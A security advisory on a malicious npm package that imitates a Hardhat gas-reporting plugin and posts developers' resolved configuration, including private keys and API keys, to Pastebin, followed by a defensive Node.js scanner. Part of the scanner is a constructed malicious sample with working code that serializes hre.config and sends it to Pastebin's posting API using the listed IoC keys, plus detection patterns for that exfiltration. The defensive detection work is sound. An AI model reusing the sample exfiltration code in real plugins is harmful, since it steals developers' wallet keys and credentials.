Malicious npm Package Targets Ethereum Developers, Masquerading as a Hardhat Development Tool

Summary:
The Socket Research team has discovered a malicious npm package named hardhat-gas-optimizer, which impersonates hardhat-gas-reporter, a legitimate plugin used by Ethereum developers working in Hardhat. Once loaded, the package serializes the resolved Hardhat configuration (hre.config), which commonly holds RPC endpoints, API keys and deployer private keys, and posts it to Pastebin without the user's knowledge. Developers are urged to review the source of Hardhat plugins before installing them, since anything loaded from hardhat.config.js runs with full access to that configuration.
#npmSecurity #DataExfiltration #EthereumRisks

Keypoints:

  • Malicious npm package named hardhat-gas-optimizer impersonates the legitimate hardhat-gas-reporter.
  • The package targets Ethereum developers using the Hardhat development environment.
  • It was uploaded to npm in February and claims to optimize gas usage during smart contract deployment.
  • The package serializes the resolved Hardhat runtime configuration object (hre.config), not a file on disk, and posts it to Pastebin. Because hardhat.config.js is evaluated before hre.config is populated, secrets pulled in through process.env or dotenv are already literal values in that object.
  • Security risks include unauthorized data exfiltration and privacy violations.
  • Socket flagged this package as malware, providing automatic protection for users.

MITRE Techniques:

  • Supply Chain Compromise: Compromise Software Supply Chain (T1195.002): a malicious package published to the public npm registry, intended to be installed by developers as a dependency.
  • Masquerading: Match Legitimate Name or Location (T1036.005): the package name and description imitate hardhat-gas-reporter so that a casual review does not distinguish the two.
  • Exfiltration Over Web Service (T1567): the configuration data is posted to pastebin.com, a legitimate public service, through its documented paste-creation API rather than to attacker-controlled infrastructure.

IoC:

The Pastebin endpoint below is the service's normal posting API and will appear in benign code; what identifies this package are the two API keys, which it must embed in order to create pastes.

  • [URL] hxxps://pastebin.com/api/api_post.php
  • [API User Key] d8186f40984375851b912c75b5bd24e7
  • [API Developer Key] zCviLVtg0oHC2aT_xQ_7VU96pzxM35ju
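The following is an added example, not code from the Socket write-up or from the package itself: a small Node.js scanner that hunts for the pattern described above in a dependency tree (Pastebin posting API, Pastebin API form fields, the two listed keys, and serialization of hre.config inside a plugin), plus a helper that walks a resolved Hardhat config and lists what an exfiltrated copy would hand over. The indicator weights, the threshold, the regular expressions, the function names and the two sample sources are this example's own choices; the sample inputs are constructed for the demonstration and are not the real package's source.

```javascript
// Static detection of the hre.config-to-Pastebin exfiltration pattern.
// Added example; not the package's code and not Socket's detection logic.

// Indicator set. Weights and threshold are assumptions made for this example;
// the endpoint and the two keys are the IoCs listed in the write-up.
const INDICATORS = [
  { id: 'pastebin-post-endpoint', weight: 3, re: /pastebin\.com\/api\/api_post\.php/i },
  { id: 'pastebin-api-fields',    weight: 2, re: /api_(dev|user)_key/ },
  { id: 'known-ioc-key',          weight: 5,
    re: /d8186f40984375851b912c75b5bd24e7|zCviLVtg0oHC2aT_xQ_7VU96pzxM35ju/ },
  { id: 'hre-config-serialised',  weight: 3,
    re: /JSON\.stringify\(\s*(?:hre|env|this\.env)\.config\b/ },
  { id: 'outbound-http',          weight: 1, re: /\b(?:https?\.request|fetch|axios\.\w+)\s*\(/ },
];

// Score one source file. A known key alone is decisive; weaker indicators
// (serialising hre.config, making an outbound request) only count together.
function scanSource(name, text) {
  const matched = INDICATORS.filter(i => i.re.test(text));
  const score = matched.reduce((s, i) => s + i.weight, 0);
  return { name, hits: matched.map(i => i.id), score, suspicious: score >= 4 };
}

// Walk a directory (e.g. node_modules) and return only suspicious files.
function scanDirectory(root, exts = ['.js', '.cjs', '.mjs', '.ts']) {
  const fs = require('fs'), path = require('path');
  const out = [];
  (function walk(dir) {
    for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
      const p = path.join(dir, ent.name);
      if (ent.isDirectory()) walk(p);
      else if (exts.includes(path.extname(ent.name))) {
        const r = scanSource(p, fs.readFileSync(p, 'utf8'));
        if (r.suspicious) out.push(r);
      }
    }
  })(root);
  return out;
}

// What an exfiltrated hre.config contains. Hardhat evaluates hardhat.config.js
// before populating hre.config, so values read from process.env are literals here.
const PRIVKEY_RE = /^(?:0x)?[0-9a-f]{64}$/i;
const CRED_FIELD_RE = /apikey|privatekey|mnemonic/i;

// Heuristic: an RPC URL whose last path segment looks like an access token.
function urlCarriesToken(s) {
  if (!/^https?:\/\//.test(s)) return false;
  const seg = s.split('?')[0].split('/').pop();
  return seg.length >= 24 && /[0-9]/.test(seg) && /[A-Za-z]/.test(seg);
}

function exposedSecrets(config, prefix = 'config') {
  const found = [];
  const visit = (v, p, key) => {
    if (typeof v === 'string') {
      if (key && CRED_FIELD_RE.test(key) && v) found.push({ path: p, kind: 'credential-field' });
      else if (PRIVKEY_RE.test(v)) found.push({ path: p, kind: 'private-key' });
      else if (urlCarriesToken(v)) found.push({ path: p, kind: 'rpc-url-with-token' });
    } else if (Array.isArray(v)) {
      v.forEach((x, i) => visit(x, `${p}[${i}]`, key));
    } else if (v && typeof v === 'object') {
      for (const k of Object.keys(v)) visit(v[k], `${p}.${k}`, k);
    }
  };
  visit(config, prefix, null);
  return found;
}

// Constructed samples: a benign gas-reporting hook and a plugin that posts
// hre.config to Pastebin. Neither is the real package's source.
const BENIGN_SAMPLE = `
const { extendEnvironment } = require("hardhat/config");
extendEnvironment((hre) => {
  hre.gasReport = (tx) => console.log("gas used:", tx.gasUsed.toString());
});`;

const MALICIOUS_SAMPLE = `
const https = require("https");
const { extendEnvironment } = require("hardhat/config");
extendEnvironment((hre) => {
  const body = new URLSearchParams({
    api_dev_key: "zCviLVtg0oHC2aT_xQ_7VU96pzxM35ju",
    api_user_key: "d8186f40984375851b912c75b5bd24e7",
    api_option: "paste",
    api_paste_code: JSON.stringify(hre.config),
  }).toString();
  https.request("https://pastebin.com/api/api_post.php", { method: "POST" }).end(body);
});`;

// Constructed resolved config, as a plugin would see it in hre.config.
const SAMPLE_CONFIG = {
  solidity: '0.8.24',
  networks: {
    hardhat: {},
    sepolia: {
      url: 'https://eth-sepolia.example-rpc.com/v2/k3yA1b2C3d4E5f6G7h8I9j0KlMnOpQ',
      accounts: ['0x' + 'ab'.repeat(32)],
    },
  },
  etherscan: { apiKey: 'ABCDEF1234567890ABCDEF1234567890AB' },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scanSource('benign.js', BENIGN_SAMPLE));
  console.log(scanSource('malicious.js', MALICIOUS_SAMPLE));
  console.log(exposedSecrets(SAMPLE_CONFIG));
  if (process.argv[2]) console.log(scanDirectory(process.argv[2]));
}
```

Run with `node scanner.js ./node_modules` to sweep a project's dependencies; the benign sample scores 0, the malicious sample trips every indicator. The `exposedSecrets` output is the practical argument for keeping deployer keys out of hardhat.config.js altogether (hardware signer, `hardhat vars`, or a per-network key injected only at deploy time): a plugin that reads hre.config gets the resolved values, so moving a key into `.env` does not protect it from code loaded by the config.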


Full Research: https://socket.dev/blog/malicious-npm-package-targets-ethereum-developers